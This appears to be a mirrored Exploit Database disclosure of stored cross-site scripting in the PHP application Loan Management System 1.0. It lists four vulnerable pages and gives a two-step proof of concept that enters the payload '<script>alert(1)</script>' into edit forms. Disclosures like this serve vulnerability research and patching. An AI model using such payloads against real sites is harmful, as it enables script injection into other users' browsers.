Loan Management System 1.0 – Multiple Cross Site Scripting (Stored)

• Exploit Database
• 65 阅读

• 作者： Akıner Kısa
  日期： 2020-10-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48909/

• # Exploit Title: Loan Management System 1.0 - Multiple Cross Site Scripting (Stored)
  # Google Dork: N/A
  # Date: 2020/10/19
  # Exploit Author: Akıner Kısa
  # Vendor Homepage: https://www.sourcecodester.com/php/14471/loan-management-system-using-phpmysql-source-code.html
  # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/loan-management-system-using-php.zip
  # Version: 1.0
  # Tested on: XAMPP 
  # CVE : N/A
  
  Vulnerable Pages:
  
  http://localhost/loan/index.php?page=loans
  http://localhost/loan/index.php?page=payments
  http://localhost/loan/index.php?page=borrowers
  http://localhost/loan/index.php?page=loan_type
  
  Proof of Concept:
  
  1 - Go to vulnerable pages and using edit button (in the right, action column).
  
  2 - And fill the blanks with "<script>alert(1)</script>" payload.